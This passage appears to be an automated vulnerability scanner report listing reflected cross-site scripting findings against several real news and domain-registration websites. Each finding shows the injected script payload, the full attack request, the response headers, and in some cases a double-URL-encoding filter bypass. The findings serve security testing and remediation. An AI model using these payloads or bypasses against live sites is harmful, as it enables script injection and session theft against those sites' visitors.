<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.206. http://www.webpronews.com/topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9c7"><script>alert(1)</script>517f94ec52d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem?ef9c7"><script>alert(1)</script>517f94ec52d=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:15 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=m1qs6rhdhhrbtsloujbagujuh0; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39164
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.207. http://www.webpronews.com/topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105e8"><script>alert(1)</script>968ed48d3d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem?105e8"><script>alert(1)</script>968ed48d3d3=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:14 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=d1opiougl0vmprnl8f82l838h5; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39137
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67fb"><script>alert(1)</script>c0f56f28c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnewsf67fb"><script>alert(1)</script>c0f56f28c51/2009/03/09/online-brand-abuse-continues-to-grow HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:06:14 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=tbe1gos9286hlj3dhf06eercb4; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14270
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae7"><script>alert(1)</script>cd340866dca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009bcae7"><script>alert(1)</script>cd340866dca/03/09/online-brand-abuse-continues-to-grow HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:15 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=o7t46mknpidpp15iucq2n18uc4; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae600"><script>alert(1)</script>4acdae22343 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03ae600"><script>alert(1)</script>4acdae22343/09/online-brand-abuse-continues-to-grow HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:17 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=9h6s831fvhjphb6isj1e7r3ba6; expires=Mon, 03 Jan 2011 05:39:37 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bb8"><script>alert(1)</script>8119496d581 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/0997bb8"><script>alert(1)</script>8119496d581/online-brand-abuse-continues-to-grow HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:18 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=lapgaf0ar0p9gnn9duf87e1187; expires=Mon, 03 Jan 2011 05:39:38 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38471
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b7a"><script>alert(1)</script>4d3654c44d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow36b7a"><script>alert(1)</script>4d3654c44d0 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:20 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=cdt4m2t7nsb1vjhr02fcb90oh1; expires=Mon, 03 Jan 2011 05:39:40 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38471
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.213. http://www.webpronews.com/topnews/2009/03/09/online-brand-abuse-continues-to-grow [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef1f"><script>alert(1)</script>b1bb77f367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow?8ef1f"><script>alert(1)</script>b1bb77f367b=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:13 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=vuem3aptrgel9ove7nb7md46d0; expires=Mon, 03 Jan 2011 05:39:33 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40246
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.214. http://www.webpronews.com/topnews/2009/03/09/online-brand-abuse-continues-to-grow [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc79"><script>alert(1)</script>c9ad7af4d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow?5fc79"><script>alert(1)</script>c9ad7af4d66=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:14 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=7o6308te5bh6umslmj46ourtk5; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40246
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ce2"><script>alert(1)</script>50c86e627bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews61ce2"><script>alert(1)</script>50c86e627bb/2009/05/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:06:22 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1mnlmbhja69o862bfbl8o4q8o6; expires=Mon, 03 Jan 2011 05:39:42 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14292
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a92a"><script>alert(1)</script>284acf19bf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/20098a92a"><script>alert(1)</script>284acf19bf7/05/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:23 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=0isus4u5km09uodlel5osh5802; expires=Mon, 03 Jan 2011 05:39:43 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58237"><script>alert(1)</script>3d657a38bba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/0558237"><script>alert(1)</script>3d657a38bba/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:24 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1hbonqqsg67bmip30d95akt497; expires=Mon, 03 Jan 2011 05:39:44 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7d5"><script>alert(1)</script>4b098b55187 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/264a7d5"><script>alert(1)</script>4b098b55187/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:26 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=a3r5lbbjp99epv99uul3nd2b75; expires=Mon, 03 Jan 2011 05:39:46 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38577
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39257"><script>alert(1)</script>17fc4b818e8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers39257"><script>alert(1)</script>17fc4b818e8 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:28 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=3hlm4d1rmo6m85bbqsi6qsm654; expires=Mon, 03 Jan 2011 05:39:48 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38603
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.220. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d26d5</script><script>alert(1)</script>53c1268f75f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5</script><script>alert(1)</script>53c1268f75f=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:21 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=vv3id7vuvl6650dm0fqt88kt11; expires=Mon, 03 Jan 2011 05:39:41 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41747
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.221. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aec7"><script>alert(1)</script>df1a9b4e482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?2aec7"><script>alert(1)</script>df1a9b4e482=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:14 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=3jv2a1chmc1sg3lcumrnlibj85; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41710
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.222. http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae5ca"><script>alert(1)</script>da955ce7746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?ae5ca"><script>alert(1)</script>da955ce7746=1 HTTP/1.1
Host: www.webpronews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:06:15 GMT
Server: Apache/2.2.8 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=stud65spqqgd3rmttti27bupi3; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41710
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f3a8%253cscript%253ealert%25281%2529%253c%252fscript%253e3be8215413d was submitted in the REST URL parameter 1. This input was echoed as 1f3a8<script>alert(1)</script>3be8215413d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /legal1f3a8%253cscript%253ealert%25281%2529%253c%252fscript%253e3be8215413d/index.dhtml HTTP/1.1
Host: www.worldsite.ws
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 11 Dec 2010 02:06:13 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 4574
<html><head><title>The Internet Land Rush is On! | GDI, Inc.</title>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece41'-alert(1)-'48cc01aaf9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/security/hundreds-of-high-profile-sites-unprotected-from-domain-hijacking/6248ece41'-alert(1)-'48cc01aaf9e HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... <script type="text/javascript"> (function() { var toolbar = new CNB.Toolbar('toolbar-163963', { 'cid': '163963', 'serviceCid': 'zdsecurity_6248ece41'-alert(1)-'48cc01aaf9e', 'title': 'Hundreds of high profile sites unprotected from domain hijacking', 'summary': 'A MarkMonitor review indicates that less than 10% of the top 300 high trafficked sites have a ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d607f"-alert(1)-"8ea1a64c36b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article2/0,1895,2135433,00.asp HTTP/1.1
Host: www.eweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d607f"-alert(1)-"8ea1a64c36b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f60"><script>alert(1)</script>a4e90e3d887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
